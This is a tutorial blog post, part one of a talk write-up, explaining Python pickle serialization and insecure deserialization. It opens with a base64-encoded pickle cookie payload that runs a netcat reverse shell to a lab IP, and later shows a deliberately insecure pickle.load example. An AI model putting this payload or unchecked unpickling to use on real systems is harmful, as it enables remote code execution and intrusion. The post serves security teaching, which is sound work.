A lot of people I ask, fail to clearly explain how the Insecure Deserialization exploits work. It is often hard to confirm and exploit. I wanted to learn deeper about this vulnerability. So I decided to give a talk at Null Hyderabad‘s June meet. This blog is write-up of the same content delivered in the meetup. This is the second episode of “The Egg Series”.
Here’s a 45-seconds demonstration of the bug:
That’s all about it. Well, I’m just kidding.
Why discuss about Insecure Deserialization?
If you have come here, you might have heard about this weakness already. It ranked 8th in the 2017 OWASP Top 10. In 2021, it was clubbed into the other similar ones and recognized under A8: Software and Data Integrity Failure. The OWASP 2017 page says the exploitation is somewhat difficult and off the shelf exploits rarely work without modification. Some automated scanners can discover this flaw but manual verification is required. However the technical impact is high. It can lead to remote code execution. This is a perfect vulnerability to take a deep dive into!
Let’s look at the magic code I pasted to the cookie:gASVNwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUQxxuYyAtYyBzaCAxOTIuMTY4LjE3LjEyOSA4ODg4lIWUUpQu
It’s a base64encoded string. It looks like the below after decoding it. Note that a dot (.) at the end of it. We will talk about this later.
Introduction
We’re talking a lot about Serialization. Let’s get that first. The wikipedia definition says:
Serialization is converting an object to a format that can be stored, transmitted and reconstructed.
Let’s take an example of Marvel movies. You can say, Bruce converting to Hulk is Serialization. When Bruce has to talk to the other Avengers (similar types), he will be a normal human-scientist. When he has to deal to with Aliens (creatures from a different world), he will convert into Hulk. Remember this point, we will connect this later.
By the way, he says “I’m always angry” in the above scene!
Let’s dig those words that underlined above.
Object:
Let’s look at Bruce, I mean Object first.
character = {“first_name”: “Bruce”, “last_name”: “Banner”}
This is a dictionary in Python. Character
is an Object. Generally speaking, an Object is a material that can be seen, touched, held etc. In Object-Oriented Programming (OOP), an Object is an Instance of a class. A Class defines the characteristics and features. Class Mobile
defines how a mobile is like: dimension, color, weight etc and the functions like: Used for making a phone call, browsing the internet etc. my_mobile
if instantiated with the Mobile
class, would follow the characteristics and functions of the class. When you say a Mobile, you are generalizing it. We get what you mean by a Mobile. When you my_mobile, you are referring to a specific mobile phone you own. All academics, isn’t it?
Dictionary in python is a data type. Are you saying it’s a class?
The difference got thinner and thinner and dictionary is a class in Python 3. Some discussion about this on stackoverflow.
Stored. Why?
As a programmer, you want to manage the state of an object, persist the object to process later. You may want to recreate the object after the program is terminated. It could be the same program or a different program running on another machine. We would store them on Disk, Database, Cache, Socket, Message Bug etc.
Transmitted. Why?
The object might need to be shared between server and clients – end users. It could be sent over to another technology. A Process P1 from a machine M1 can send a rich Object to process P2 running on another machine M2.
Reconstructed. Why?
The object sent from client browser may need to be reconstructed into native objects on the server-side or another technology needs to process it. This could be a shared service, micro service and so on.
Why we Serialize?
The Object created in one environment can’t be understood by another. For example, if you create an object in Python and send it to a java process, the JRE can’t know what the object is made of – characteristics and features. Or the objects need to be exchanged between different layers such as Browser to Server, File or database to business layer. You may want to get a task done by a micro service running on an external location and pass an object to it. Blame the Object-oriented Programing and MVC design pattern, we see in everything in Object and Models.
Examples of Serialize & Deserialize
In the serialize.py, I’m initializing character
with first_name
and last_name
. I’m printing the raw python object and serialized object. The dumps()
is a method in Pickle, used to dump the object into serialized byte stream.
import pickle
def just_serialize():
character = {"first_name": "Bruce", "last_name": "Banner"}
print(" ---- The Object ----")
print(character)
serialized_character = pickle.dumps(character)
print(" ---- The Serialized Data ----")
print(serialized_character)
if __name__ == '__main__':
just_serialize()
Take a look at the output below. This is how a serialized data look in Hex when printed. It’s a byte stream.
Similarly, in deserialize.py, I’ve hard-coded the same serialized byte stream and created character
object out of it. The loads
accepts byte stream and convert them into an object.
import pickle
def just_deserialize():
content = b'\x80\x04\x95/\x00\x00\x00\x00\x00\x00\x00}\x94(\x8c\nfirst_name\x94\x8c\x05Bruce\x94\x8c\tlast_name\x94\x8c\x06Banner\x94u.'
print(" ---- The Data before deserialization ----")
print(content)
pickled_object = pickle.loads(content)
print(" ---- The Object after deserialization ----")
print(pickled_object)
if __name__ == '__main__':
just_deserialize()
Let’s gear-up and apply base64encode and decode to the same, which is the usual pattern used for a better transmission and storage. I’m assuming client will serialize and server to deserialize.
from base64 import b64encode
import pickle
def just_serialize():
character = {"first_name": "Bruce", "last_name": "Banner"}
pickled_object = pickle.dumps(character)
pickled_object = b64encode(pickled_object)
print(pickled_object.decode("utf-8"))
if __name__ == '__main__':
just_serialize()
from base64 import b64decode
import pickle
def just_deserialize():
content = b'gASVLwAAAAAAAAB9lCiMCmZpcnN0X25hbWWUjAVCcnVjZZSMCWxhc3RfbmFtZZSMBkJhbm5lcpR1Lg=='
content = b64decode(content)
user_data = pickle.loads(content)
print(user_data)
if __name__ == '__main__':
just_deserialize()
Python Pickle
You may be wondering about dumps()
and loads()
from Pickle. Pickle is Python’s built-in module for serializing and deserializing.
Pickling is a way to convert object into Byte Stream. It’s also called Serializing, Marshalling and Flattening. The dumps()
dumps object to byte stream, there is another dump()
to dump the object into a File – no other difference.
Unpickling is the opposite way of Pickling. It converts serialized data into Objects, with which you can find it’s properties or call the methods. loads()
accepts serialized byte stream and load()
expects the serialized stream from a file.
As a programmer, you tend to prefer the built-in modules over third-party libraries – which is why you see Pickles commonly.
But the Problem is..
Python’s official documentation on Pickle says the module is not secure and warns us to not unpickle data we don’t trust. They even documented that it is possible to construct a malicious pickle data which leads to arbitrary remote code execution.
Let’s experiment with what Python documentation said.
serialize-to-file.py initializes a dictionary objects and dumps into a file. The deserialize-from-file.py will read a pickle file from the file system, create an object out of it and prints the first_name and last_name. Very similar to what we saw before, only difference is object is dumped to and loaded from a file.
import pickle
def just_serialize():
pickle_file = "user.pickle"
character = {"first_name": "Tony", "last_name": "Stark"}
print("Pickling the below object:")
print(character)
with open(pickle_file, "wb") as file:
pickle.dump(character, file)
print("Pickled to: %s" % pickle_file)
if __name__ == '__main__':
just_serialize()
import pickle
from base64 import b64decode
def insecure_deserialize():
pickle_file = "user.pickle"
with open(pickle_file, "rb") as file:
print("Deserializing %s" % pickle_file)
user = pickle.load(file) # INSECURE!
print("First Name: %s and Last Name: %s" % (user['first_name'], user['last_name']))
if __name__ == '__main__':
insecure_deserialize()
Now image the user.pickle
is supplied by untrusted end-users. After all it’s coming from file system. There can be some low privileged users who have write access or control to the pickle file and they can change the content of user.pickle
. An untrusted user can control the serialized stream and possibly replace the legitimate data by bad objects. How can this lead to remote code execution? Continue Reading: How Eggxactly Insecure Deserialization Exploit works – Part 2